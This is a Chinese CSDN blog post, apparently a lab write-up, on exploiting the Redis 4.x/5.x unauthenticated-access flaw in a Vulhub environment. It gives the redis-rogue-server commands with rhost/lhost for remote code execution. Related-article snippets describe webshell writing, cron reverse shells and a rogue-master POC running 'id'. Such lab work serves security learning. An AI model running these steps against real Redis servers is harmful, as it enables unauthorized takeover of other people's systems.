Redis 4.x5.x 未授权访问漏洞EXP复现过程

最新推荐文章于 2024-04-24 20:09:33 发布
最新推荐文章于 2024-04-24 20:09:33 发布
阅读量554 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: redis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yiiiing/article/details/108218674
版权

Redis 4.x5.x 未授权访问漏洞EXP复现过程

本次使用Vulhub一键搭建漏洞测试靶场 地址:https://vulhub.org/#/environments/redis/4-unacc/ 搭建过程就不讲了
在这里插入图片描述
可以看到已经启动docker了
在这里插入图片描述
Nmap探测一下靶机端口
在这里插入图片描述
如上图所示,redis服务正常开启了,在6379端口
kali直接用redis连接,发现可直接访问,还能通过info命令查看到服务器等一些敏感信息
在这里插入图片描述
然后将exp git clone 到本地 https://github.com/n0b0dyCN/redis-rogue-server
在这里插入图片描述
cd 到目录 redis-rogue-server /RedisModulesSDK/exp/
然后 make 进行编译,目录下会多一个exp.so文件
在这里插入图片描述
然后回到 redis-rogue-server.py / 目录下
输入命令:./redis-rogue-server.py --rhost 192.168.124.148 --lhost 192.168.124.134
如果这样报错的话,就需要指定python3
在这里插入图片描述
python3 ./redis-rogue-server.py --rhost 192.168.124.148 --lhost 192.168.124.134
在这里插入图片描述

yiiiing
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现】---- Redis 4.x/5.x 授权访问漏洞
qq_43168364的博客
12-24 1241
一、简介 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库。Redis提供了多种语言的API。Redis默认使用6379端口 Redis授权漏洞产生的原因 ---- Redis默认使用6379端口,并且Redis默认是空密码并且默认允许远程连接。一些管理员在安装好Redis之后,并没有修改它的默认端口。而且也没有设置密码的话,黑客就可以通过Redis数据库写入任意文件进行提权,从而操控该服务器。 Redis授权访问在4.x/5.0.5以前
.bat脚本自动yes_Redis授权访问漏洞(自写自动化利用EXP分享)
weixin_35835018的博客
12-28 243
# 前言:之前已经有文章写过redis授权访问的利用总结了,这次主要是py脚本自动化的一个小分享吧。也算是对自己学习的一个记录..一、环境搭建(建议用centos7搭建):wget http://download.redis.io/releases/redis-5.0.0.tar.gztar -xvzf redis-5.0.0.tar.gzcd redis-5.0.0make漏洞描述:...
[天翼杯 2021]esay_eval-----记Redis提权
qq_73767109的博客
06-25 154
一旦攻击者获得了访问权限,他们就可以上传 exp.so 文件到 Redis 服务器中,并使用 Redis 的 module load 命令加载这个文件。exp.so 文件是一个 Redis 模块,它提供了一些命令和功能,可以让攻击者在 Redis 服务器中执行任意代码,从而获得服务器的控制权。Vim缓存泄露指的是当用户在Vim编辑器中打开了一个文件,并进行了修改,然后使用了Vim或其他工具关闭了该文件,但Vim缓存中仍然保留着该文件的副本,从而导致该文件中的敏感信息(例如密码、私密密钥等)泄露的漏洞
Redis-4-unacc授权访问漏洞复现(一看就会)
最新发布
m0_69043895的博客
04-24 901
Redis是一个开源的内存数据库,它以键值对的方式存储数据。以下是关于 Redis 的主要特点和用途:内存存储,键值存储,持久性,数据结构支持。默认端口为6379。Redis默认情况下,会绑定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没有配置密码访问
【简单复现Redis 4.x/5.x 授权访问漏洞
qq_45751902的博客
10-06 1072
开了web服务器,并且知道路径(如利用phpinfo,或者错误爆路经),还需要具有文件读写增删改查权限(我们可以将dir设置为一个目录A,而dbfilename为文件名B,再执行save或bgsave,则我们就可以写入一个路径为/A/B的任意文件。攻击者在授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,因为是实验环境,靶机端口没有改,redis密码没有设置(设置的话,需要爆破)等,这样将会将Redis服务暴露到公网上,如果在没有设置。
Redis 4.x/5.x 授权访问漏洞+getShell漏洞复现
CNXBDSa的博客
11-26 2950
背景环境 Redis授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。 复现地址 复现地址 vulhub/redis/4-unacc 脚本检测 redis 授权批量检测工具脚本,该脚本支持弱口令检测 #!/usr/bin/python2 # -*- coding: utf-8 -*- import socket import sys def check(ip, port, timeout): try:
Redis 4.x/5.x 授权访问漏洞
EC_Carrot的博客
07-25 168
漏洞简介 Redis授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。 漏洞复现 我们直接使用POC来完成这次复现: python3 redis-master.py -r target-ip -p 6379 -L local-ip -P 8888 -f RedisModulesSDK/exp.so -c "id" ...
redis4.0x5.0x-远程命令漏洞利用exp.rar
07-09
redis4.0x5.0x-远程命令漏洞利用exp 2019年7月9日版,仅用来学习测试,不可用于非法用途,谢谢配合,实测可用
Redis3.x和Redis4.x的Windows版.zip
06-16
在Windows环境下安装Redis,通常需要下载预编译的二进制文件,解压后配置`redis.conf`文件,根据需求设置端口、日志级别、持久化方式等参数。启动服务可以使用`redis-server.exe`命令。同时,Windows版Redis提供了`...
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
Redis 4.x5.x 授权访问漏洞(RCE)
网络安全。
02-14 1390
0x01 简介 Redis授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。 0x02 漏洞复现 1、环境启动后,通过redis-cli -h your-ip即可进行连接,可见存在授权访问漏洞。 2、使用如下POC即可直接执行命令。 工具地址:https://github.com/vulhub/redis-rogu...
redis漏洞复现】4-unacc授权访问漏洞
serendipity1130的博客
09-01 938
4-unacc: 1.nmap探测一下靶机端口,redis服务正常开启了,在6379端口 nmap 192.168.225.139 -p 1-65535 2.kali直接用redis连接,发现可直接访问,还能通过info命令查看到服务器等一些敏感信息,证明存在授权访问漏洞 redis-cli -h 192.168.225.139 3.使用网上的脚本,在redis-rogue-server.py / 目录下 输入命令,成功GETSHELL并执行了ls的命令: ./red
漏洞复现Redis-rce
weixin_30300225的博客
07-11 328
通过主从复制 GetShell  Redis主从复制   Redis是一个使用ANSI C编写的开源、支持网络、基于内存、可选持久性的键值对存储数据库。但如果当把数据存储在单个Redis的实例中,当读写体量比较大的时候,服务端就很难承受。为了应对这种情况,Redis就提供了主从模式,主从模式就是指使用一个redis实例作为主机,其他实例都作为备份机,其中主机和从机数据相同,而从机只负责读,主机...
渗透测试-Redis授权访问漏洞利用
cdyunaq的博客
12-24 1154
危害 信息泄露 系统信息 redis保存的信息 写文件GetShell 在Web目录中写入webshell 写入SSH公钥直接连接 写入计划任务(corntab)反弹shell 高级利用 主从复制getshell(4.x version < 5.0.5) 模块加载执行命令(> 4.x) 环境准备 机型 ip 服务 版本 攻击机
Redis主从复制实现RCE
rev1ve的博客
12-01 2248
主从复制是指将一台Redis主服务器的数据,复制到其他的Redis从服务器。前者称为主节点(master),后者称为从节点(slave);主服务器可以进行读写操作,当发生写操作时自动将写操作同步给从服务器,而从服务器一般是只读,并接受主服务器同步过来写操作命令,然后执行这条命令。 也就是说,所有的数据修改只在主服务器上进行,然后将最新的数据同步给从服务器,这样就使得主从服务器的数据是一致的。建立主从复制,有3种方式:PS:建立主从关系只需要在从节点操作就行了,主节点不用任何操作我们先在同一个机器开两个red
数据库攻防之Redis
m0_71745754的博客
01-17 1055
Redis(Remote Dictionary Server)是一个由 Salvatore Sanfillppo 写的 key-value存储系统。是一个开源的使用 ANSI C 语言编写、遵守 BSD 协议、支持网络、可基于内存、分布式、可选持久性的键值对(Key-Value)存储数据库,并提供多种语言的API。通常被称为数据结构服务器,因为值(value)可以是字符串(string)、哈希(hash)、列表(list)、集合(sets)和有序集合(sortedsets)等类型。
Redis攻防(授权访问、利用redis写入webshell、任务计划反弹、Shellssh-keygen 公钥登录服务器、利用主从复制RCE)
Love&Share
12-13 8777
文章目录授权访问利用redis写入webshell任务计划反弹Shellssh-keygen 公钥登录服务器利用主从复制RCEwindowsSSRF安全设置 REmote DIctionary Server(Redis) 是一个 key-value 存储系统,是跨平台的非关系型(Nosql)数据库 关于Redis可以看菜鸟教程: https://www.runoob.com/redis/redis-tutorial.html 授权访问 主要是因为配置不当,导致授权访问漏洞,进一步将恶意数据写入内.
redis3.x和redis 6.x版本区别
07-28
Redis 3.x 和 Redis 6.x 是 Redis 数据库的不同版本,它们之间有一些重要的区别。以下是其中一些主要区别: 1. 多线程支持:Redis 3.x 是单线程的,在处理请求时只能使用一个 CPU 核心。而 Redis 6.x 引入了多线程支持,可以利用多个 CPU 核心进行并行处理,从而提高了性能。 2. 内存分配器:Redis 3.x 使用了 jemalloc 作为默认的内存分配器,而 Redis 6.x 则改为使用了更现代化的 TCMalloc。 3. RDB 文件格式:Redis 3.x 使用 RDB 文件格式来进行持久化,而 Redis 6.x 引入了新的 RDB 文件格式,该格式支持更多的数据类型和功能。 4. 模块化:Redis 6.x 引入了模块化的架构,允许开发者通过编写插件来扩展 Redis 的功能。这使得开发者可以更方便地定制和增强 Redis 的行为。 5. ACL(访问控制列表):Redis 6.x 引入了更强大的 ACL 功能,允许管理员对 Redis 进行更细粒度的权限控制和用户管理。 6. 复制和集群:Redis 6.x 对复制和集群的支持进行了改进,提供了更高的可靠性和容错性。 这些是 Redis 3.x 和 Redis 6.x 之间的一些重要区别,但还有其他一些细微的变化和改进。根据您的具体需求和使用场景,选择适合的版本是很重要的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值